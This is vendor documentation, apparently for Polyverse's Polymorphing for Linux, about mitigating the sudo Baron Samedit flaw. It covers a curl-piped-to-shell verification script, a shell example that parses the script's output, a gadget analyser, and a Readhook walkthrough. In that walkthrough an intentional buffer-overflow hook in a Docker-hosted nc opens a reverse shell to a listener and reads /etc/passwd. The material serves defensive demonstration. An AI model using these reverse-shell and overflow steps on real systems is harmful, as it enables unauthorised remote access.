Mitigate Baron Samedit (CVE-2021-3156) vulnerability

Verification Script

This script lists which repository every installed package was downloaded from. You can use this to verify which packages were replaced by Polymorphic versions.

Note: this script uses the strings utility, which can be found in the binutils package.

curl | sh -s list-installed-elf

Verification Script Output

The verification script will print out a list of binaries installed on your system, their associated packages, which repository they were downloaded from, and whether they were compiled with our Polymorphic compiler.

This is some example output from the list-installed-elf command on a Polymorphed installation of CentOS:

cyrus-sasl-lib.x86_64 @polyverse-os true /usr/lib64/sasl2/
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/lib64/sasl2/
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/lib64/sasl2/
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/sbin/sasldblistusers2
cyrus-sasl-lib.x86_64 @polyverse-os true /usr/sbin/saslpasswd2
dbus.x86_64 @polyverse-updates true /lib64/dbus-1/dbus-daemon-launch-helper
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-cleanup-sockets
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-daemon
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-monitor
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-run-session

Here's what the individual parts of each line mean:

dbus.x86_64 @polyverse-updates true /usr/bin/dbus-run-session

  • dbus.x86_64 - The package that this binary came from
  • @polyverse-updates - The repository this package was downloaded from
  • true - Whether this binary was compiled with our Polymorphic compiler
  • /usr/bin/dbus-run-session - The specific binary for this line of output

If you want to see only the binaries that came from Polyverse repositories, you can pipe the output to grep:

curl | sh -s list-installed-elf | grep polyverse
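Grepping for "polyverse" shows what has been replaced; the inverse question (which ELF files are still stock builds, and which packages still come from non-Polyverse repositories) is the one you want answered after a rollout. The following POSIX shell functions are an added example and are not part of Polyverse's list-installed-elf script; they assume only the four-field line format documented above. The sample output is constructed, and the bash and sudo rows are hypothetical stand-ins for packages that were never replaced.

```shell
#!/bin/sh
# Added example (not Polyverse's script): post-process list-installed-elf
# output to find binaries that have NOT been replaced by Polymorphic versions.
# Assumed line format, from the documented output:
#   <package> <repository> <true|false> <path>

# Constructed sample; the bash and sudo lines are hypothetical rows standing
# in for packages that still come from stock repositories.
SAMPLE_OUTPUT='cyrus-sasl-lib.x86_64 @polyverse-os true /usr/sbin/saslpasswd2
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-daemon
dbus.x86_64 @polyverse-updates true /usr/bin/dbus-monitor
bash.x86_64 @base false /usr/bin/bash
sudo.x86_64 @updates false /usr/bin/sudo'

# Paths of binaries whose third field is not "true", i.e. still stock builds.
non_polymorphic() {
    awk '$3 != "true" { print $4 }'
}

# Packages whose repository is not a @polyverse-* repository, one line each,
# de-duplicated because a package usually contributes several ELF files.
foreign_repo_packages() {
    awk '$2 !~ /^@polyverse-/ { print $1 " " $2 }' | sort -u
}

# Per-package tally: how many of its ELF files are polymorphic out of the total.
per_package_summary() {
    awk '{ total[$1]++; if ($3 == "true") poly[$1]++ }
         END { for (p in total) printf "%s %d/%d polymorphic\n", p, poly[p] + 0, total[p] }' | sort
}

# On a live system you would feed the real script's output instead, e.g.
#   curl <script URL> | sh -s list-installed-elf | non_polymorphic
# The constructed sample is used here so the example runs offline.
printf '%s\n' "$SAMPLE_OUTPUT" | non_polymorphic
printf '%s\n' "$SAMPLE_OUTPUT" | foreign_repo_packages
printf '%s\n' "$SAMPLE_OUTPUT" | per_package_summary
```

An empty result from non_polymorphic is the condition you actually want to verify; anything it prints is a binary that an exploit crafted against the stock build would still match.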

Entropy Analysis

Polyverse provides a completely self-contained binary ROP/JOP gadget analyzer for comparing two binaries side by side and understanding their structures. It is written in 100% pure JavaScript and runs as a self-contained, client-side browser application. It is focused on extreme simplicity of usage and portability across platforms.

  1. Browse to
  2. Retrieve a binary from a system that does not have Polymorphing for Linux
  3. Drag and drop the binary into the specified space in the web application (usually on the right)
  4. Observe that the analysis will automatically begin
  5. Retrieve a binary from a system that does have Polymorphing for Linux installed
  6. Drag and drop the binary into the specified space in the web application (usually on the left)
  7. Observe that the analysis will automatically begin
  8. Observe that the structure of the stock binary is very different from the polymorphic binary

A video about this analysis tool can be found here.

Readhook Buffer Overflow Simulator and Exploit

Readhook is an intentional (and very helpful) buffer-overflow tool, which Red-Teams and individuals can use to get past the difficult and time-consuming business of crafting an exploit. It allows for a full demonstration of the capabilities of Polymorphing for Linux, such that a malicious payload, that works across homogeneous systems, will fail when it targets a Polymorphing for Linux system.

We can observe Readhook in action by hooking a standard Linux utility (nc) and then having it “phone home” to a listener on port 5555 via a buffer-overflow exploit. We will rely on Docker to host nc (netcat or ncat on some systems) with Readhook, and a host machine will be listening for the call (also using nc, so try to keep them straight as you step through this). The plain text in the blocks consists of commands that you can cut and paste into your shells. The bold text shows examples of what you can expect to see back from the preceding command.

Shell 1: Start a listener for the exploit to call back to. You’ll need the IP address of this listener so you can generate a payload that knows where to call back to. (Since the host is using Docker for Mac, the Docker DNS entry “docker.for.mac.localhost” can be used, which resolves to the host’s Docker IP address.)

nc -l 5555

Shell 2: Open a new shell to start the echo server with readhook. The following commands retrieve the readhook components and run (a second) nc configured as an “echo server” with readhook active.

docker run --rm --name echo -d -p 8080:8080 alpine:3.7 sh -c 'wget -q -O /tmp/ && wget -q -O /tmp/ && LD_PRELOAD="/tmp/ /tmp/" nc -l -p 8080 -e /bin/cat'

Shell 2: In the same shell, run (a third) nc to connect to the echo server that you just launched. (It’s running in the background.)

nc localhost 8080

Shell 2: Also in the same shell, try the same thing with the magic string “xyzzx”, the verb “MAKELOAD”, and the IP address (or DNS name) of the listener (listening in shell 1; in my case, I can use the special Docker DNS name “docker.for.mac.localhost”).


That returns:


Aha! That’s not an echo, it’s the string that will cause nc to phone home to the listener. Let’s test it out.

Shell 2: Copy the result from above (the red text) and send it back to the echo server. It contains a magic string and a different verb, “OVERFLOW”.


Hmm… That’s not an echo either. (It turns out the echo server has given way to our exploit: there is now a reverse shell where our echo server used to be.) Let’s go back to our original listener running in Shell 1 to see what we can do.

Shell 1: Go back to the first shell that is listening to port 5555.

cat /etc/passwd
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin

That’s it! You can do the same thing with any application that links to libc (which is just about everything).

Additional Information

The registered trademark Linux® is used pursuant to a sublicense from the Linux Foundation, the exclusive licensee of Linus Torvalds, owner of the mark on a world­wide basis.